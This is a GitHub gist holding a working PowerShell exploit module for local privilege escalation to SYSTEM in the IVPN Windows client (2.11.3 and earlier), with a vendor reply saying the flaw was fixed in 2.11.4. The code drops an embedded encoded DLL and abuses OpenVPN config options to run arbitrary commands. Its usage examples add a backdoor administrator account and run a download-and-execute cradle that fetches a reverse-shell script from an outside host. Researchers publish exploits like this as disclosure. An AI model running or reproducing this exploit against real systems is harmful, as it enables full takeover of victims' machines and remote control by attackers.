Skip to content

Instantly share code, notes, and snippets.

@ykoster
Last active March 13, 2020 06:49
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
Embed
What would you like to do?
IVPN <= 2.11.3 exploit module to run commands with SYSTEM privileges
<#
Example usage:
Import-Module .\Invoke-ExploitIVPNLPE.psd1
Invoke-ExploitIVPNLPEConfigHijack "net user backdoor P@ssword /add" "net localgroup administrators backdoor /add"
Invoke-ExploitIVPNLPEPkcs11 "net user backdoor P@ssword /add" "net localgroup administrators backdoor /add"
Invoke-ExploitIVPNLPEConfigOption -Command "powershell -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')"
#>
@{
RootModule = 'Invoke-ExploitIVPNLPE.psm1'
ModuleVersion = '1.0'
GUID = '73630188-3482-4d37-a546-b114adcbe223'
Author = 'Yorick Koster'
CompanyName = 'Securify B.V.'
Copyright = '(c) Yorick Koster. All rights reserved.'
Description = 'IVPN exploit module to run commands with SYSTEM privileges'
RequiredAssemblies = @("$env:ProgramFiles\IVPN Client\IVPN.Core.dll")
FunctionsToExport = @("Invoke-ExploitIVPNLPEConfigHijack", "Invoke-ExploitIVPNLPEPkcs11", "Invoke-ExploitIVPNLPEConfigOption")
}
Enum ExploitMethod
{
ConfigHijack = 0
Pkcs11 = 1
ConfigOption = 2
}
Function Invoke-ExploitIVPNLPEConfigHijack {
Param([Parameter(Position = 0, Mandatory = $true, ValueFromRemainingArguments = $true)] [string[]]$Command)
Invoke-ExploitIVPNLPE -Command $($Command -join "`n") -ExploitMethod 0
}
Function Invoke-ExploitIVPNLPEPkcs11 {
Param([Parameter(Position = 0, Mandatory = $true, ValueFromRemainingArguments = $true)] [string[]]$Command)
Invoke-ExploitIVPNLPE -Command $($Command -join "`n") -ExploitMethod 1
}
Function Invoke-ExploitIVPNLPEConfigOption {
Param([Parameter(Position = 0, Mandatory = $true, ValueFromRemainingArguments = $true)] [string[]]$Command)
Invoke-ExploitIVPNLPE -Command $($Command -join "`n") -ExploitMethod 2
}
Function Invoke-ExploitIVPNLPE {
Param([Parameter(Position = 0, Mandatory = $true)] [string]$Command,
[Parameter(Position = 1, Mandatory = $true)] [ExploitMethod]$ExploitMethod)
# setup
New-Item -Type directory -Path $([IVPN.Platform]::SettingsDirectory) | Out-Null
Copy-Item -Path "$env:ProgramFiles\IVPN Client\etc\port.txt" -Destination "$([IVPN.Platform]::SettingsDirectory)\port.txt" | Out-Null
# embedded 32-bit DLL that runs payload.bat
$EncodedCompressedFile = "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"
$DeflatedStream = New-Object System.IO.Compression.GZipStream([System.IO.MemoryStream][System.Convert]::FromBase64String($EncodedCompressedFile), [System.IO.Compression.CompressionMode]::Decompress)
$dll = New-Object byte[] 13312
$DeflatedStream.Read($dll, 0, $dll.Length) | Out-Null
$DeflatedStream.Close() | Out-Null
# reflection stuff
$mConnectToService = [IVPN.IVPNClientProxy].GetMethod("ConnectToService", [Reflection.BindingFlags]"NonPublic, Instance")
$mSendRequest = [IVPN.IVPNClientProxy].GetMethod("SendRequest", [Reflection.BindingFlags]"NonPublic, Instance")
$fStreamReader = [IVPN.IVPNClientProxy].GetField("__StreamReader", "NonPublic, Instance")
$fStreamWriter = [IVPN.IVPNClientProxy].GetField("__StreamWriter", "NonPublic, Instance")
$fVersion = [IVPN.IVPNHelloRequest].GetField("Version", "NonPublic, Instance")
$fKey = [IVPN.IVPNSetPreferenceRequest].GetField("Key", "NonPublic, Instance")
$fValue = [IVPN.IVPNSetPreferenceRequest].GetField("Value", "NonPublic, Instance")
$fEntryVpnServer = [IVPN.VpnProtocols.OpenVPN.OpenVPNConnectionParameters].GetField("EntryVpnServer", "NonPublic, Instance")
$fUsername = [IVPN.VpnProtocols.OpenVPN.OpenVPNConnectionParameters].GetField("Username", "NonPublic, Instance")
$fPassword = [IVPN.VpnProtocols.OpenVPN.OpenVPNConnectionParameters].GetField("Password", "NonPublic, Instance")
$fPort = [IVPN.VpnProtocols.OpenVPN.OpenVPNConnectionParameters].GetField("Port", "NonPublic, Instance")
$fVpnType = [IVPN.IVPNConnectRequest].GetField("VpnType", "NonPublic, Instance")
$fOpenVpnParameters = [IVPN.IVPNConnectRequest].GetField("OpenVpnParameters", "NonPublic, Instance")
$fCurrentDns = [IVPN.IVPNConnectRequest].GetField("CurrentDns", "NonPublic, Instance")
# connect to service
$client = New-Object IVPN.IVPNClientProxy
$mConnectToService.Invoke($client, $null)
$client.ServiceConnected = $true
# send hello request
$hello = New-Object IVPN.IVPNHelloRequest
$fVersion.SetValue($hello, "2.11.2.0")
$mSendRequest.Invoke($client, $hello)
Start-Sleep 1
If($ExploitMethod -eq [ExploitMethod]::ConfigHijack) {
$targetfolder = "$env:SystemDrive\etc"
New-Item -Type directory -Path "$targetfolder\ssl" | Out-Null
Set-Content "$targetfolder\ssl\payload.bat" -Encoding ASCII $Command
Set-Content "$targetfolder\ssl\lpe.dll" -Encoding Byte $dll
Set-Content "$targetfolder\ssl\openssl.cnf" -Encoding ASCII "openssl_conf = init
[init]
engines = engines
[engines]
lpe = lpe
[lpe]
engine_id = lpe
dynamic_path = C:\\etc\\ssl\\lpe
default_algorithms = ALL
init = 1"
} Else {
$targetfolder = "$env:TEMP\" + [System.Guid]::NewGuid()
$dllname = [System.Guid]::NewGuid().ToString()
New-Item -Type directory -Path "$targetfolder" | Out-Null
Set-Content "$targetfolder\payload.bat" -Encoding ASCII $Command
Set-Content "$targetfolder\$dllname.dll" -Encoding Byte $dll
If($ExploitMethod -eq [ExploitMethod]::Pkcs11) {
$extraparam = "pkcs11-providers $("$targetfolder\$dllname.dll".Replace("\", "\\"))`npkcs11-id $dllname"
} Else {
Set-Content "$targetfolder\openvpn.cfg" -Encoding ASCII "engine $("$targetfolder\$dllname".Replace("\", "\\"))"
$extraparam = "config $("$targetfolder\openvpn.cfg".Replace("\", "\\"))"
}
# set OpenVPN extra config parameters
$setting = New-Object IVPN.IVPNSetPreferenceRequest
$fKey.SetValue($setting, "open_vpn_extra_parameters")
$fValue.SetValue($setting, $extraparam)
$mSendRequest.Invoke($client, $setting)
Start-Sleep 1
}
# launch OpenVPN
$server = New-Object IVPN.VpnProtocols.OpenVPN.OpenVPNVpnServer -Property @{IpAddresses = @("127.0.0.1"); GatewayId = "GatewayId"; CountryCode = "US"; Country = "United States"; City = "New York"}
$conparams = New-Object IVPN.VpnProtocols.OpenVPN.OpenVPNConnectionParameters
$fEntryVpnServer.SetValue($conparams, $server)
$fUsername.SetValue($conparams, "Username")
$fPassword.SetValue($conparams, "Password")
$fPort.SetValue($conparams, $(New-Object IVPN.VpnProtocols.DestinationPort(1337, 1)))
$conreq = New-Object IVPN.IVPNConnectRequest
$fVpnType.SetValue($conreq, [IVPN.VpnProtocols.VpnType]::OpenVPN)
$fOpenVpnParameters.SetValue($conreq, $conparams)
$fCurrentDns.SetValue($conreq, "8.8.8.8")
$mSendRequest.Invoke($client, $conreq)
Start-Sleep 3
# disconnect vpn
$mSendRequest.Invoke($client, $(New-Object IVPN.IVPNDisconnectRequest))
Start-Sleep 1
# disconnect from service
$fStreamReader.GetValue($client).Close()
$fStreamWriter.GetValue($client).Close()
$client = $null
# clean up
Remove-Item $([IVPN.Platform]::SettingsDirectory) -Force -Recurse
Remove-Item $targetfolder -Force -Recurse
}
@stenya
Copy link

stenya commented Mar 13, 2020

Hi.
This local privilege escalation vulnerability fixed since the Windows client v2.11.4.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment